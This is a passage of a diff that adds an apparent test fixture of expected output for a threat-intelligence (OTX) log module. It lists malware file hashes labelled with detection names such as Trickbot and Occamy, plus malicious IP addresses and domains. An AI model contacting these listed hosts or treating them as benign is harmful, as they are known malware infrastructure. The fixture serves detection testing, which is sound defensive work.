"6df5e1a017dff52020c7ff6ad92fdd37494e31769e1be242f6b23d1ea2d60140", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2037, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "c72fef3835f65cb380f6920b22c3488554d1af6d298562ccee92284f265c9619", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2203, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e711fcd0f182b214c6ec74011a395f4c853068d59eb7c57f90c4a3e1de64434a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2369, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d3ec8f4a46b21fb189fc3d58f3d87bf9897653ecdf90b7952dcc71f3b4023b4e", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2536, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "70447996722e5c04514d20b7a429d162b46546002fb0c87f512b40f16bac99bb", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2703, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "29340643ca2e6677c19e1d3bf351d654", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 2919, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "86c314bc2dc37ba84f7364acd5108c2b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3135, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "cb0c1248d3899358a375888bb4e8f3fe", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56", + "threatintel.otx.title": "Trojan:Win32/Occamy.B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3355, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "d348f536e214a47655af387408b4fca5", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3571, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "vad_contains_network_strings" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3764, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "b105891f90b2a8730bbadf02b5adeccbba539883bf75dec2ff7a5a97625dd222", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 3931, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e4db5405ac7ab517d43722e1ca8d653ea4a32802bc8a5410d032275eedc7b7ee", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4098, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win.Malware.TrickbotSystemInfo-6335590-0" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4303, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "5051906d6ed1b2ae9c9a9f070ef73c9be8f591d2e41d144649a0dc96e28d0400", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4470, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "14b74cb9be8cad8eb5fa8842d00bb692", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa", + "threatintel.otx.title": "Win.Malware.TrickbotSystemInfo-6335590-0" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4709, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "a5b59f7d133e354dfc73f40517aab730f322f0ef", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 465e7c1e36899284da5c4425dfd687af2496f397fe60c85ea2b4d85dff5a08aa", + "threatintel.otx.title": "Win.Malware.TrickbotSystemInfo-6335590-0" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 4958, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5125, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "ff2dcea4963e060a658f4dffbb119529", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 5cb822616d2c9435c9ddd060d6abdbc286ab57cfcf6dc64768c52976029a925b", + "threatintel.otx.title": "vad_contains_network_strings" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5352, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "0d73f1a1c4b2f8723fffc83eb3d00f31", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413", + "threatintel.otx.title": "vad_contains_network_strings" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5579, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "185.25.50.167", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5684, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5851, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6018, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trojan:Win32/Occamy.B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6204, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6386, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "b8e463789a076b16a90d1aae73cea9d3880ac0ead1fd16587b8cd79e37a1a3d8", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6553, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6735, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6917, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "c51024bb119211c335f95e731cfa9a744fcdb645a57d35fb379d01b7dbdd098e", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7084, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "ad20c6fac565f901c82a21b70f9739037eb54818", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7310, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "13f11e273f9a4a56557f03821c3bfd591cca6ebc", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7536, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "1581fe76e3c96dc33182daafd09c8cf5c17004e0", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7762, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "b72e75e9e901a44b655a5cf89cf0eadcaff46037", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56", + "threatintel.otx.title": "Trojan:Win32/Occamy.B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7992, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "maper.info", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8096, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "213.252.244.126", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8203, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "78.129.139.131", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8309, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8498, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8687, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8876, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9065, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9254, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9443, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9632, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "103.13.67.4", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9735, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "80.90.87.201", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9839, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "80.80.163.182", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9944, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "91.187.114.210", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10050, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "170.238.117.187", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10157, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10324, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "103.84.238.3", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10428, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "179.43.158.171", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10534, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "198.211.116.199", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10641, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "203.176.135.102", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trickbot" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10754, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "fotmailz.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10860, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "pori89g5jqo3v8.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10972, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "sebco.co.ke", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11077, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "177.74.232.124", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trickbot" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11189, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "chishir.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11294, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "kostunivo.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11401, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "mangoclone.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11509, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "onixcellent.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11618, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "fc0efd612ad528795472e99cae5944b68b8e26dc", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11774, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "24d4bbc982a6a561f0426a683b9617de1a96a74a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Sf:ShellCode-DZ\\ [Trj]" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11936, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "fa98074dc18ad7e2d357b5d168c00a91256d87d1", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + 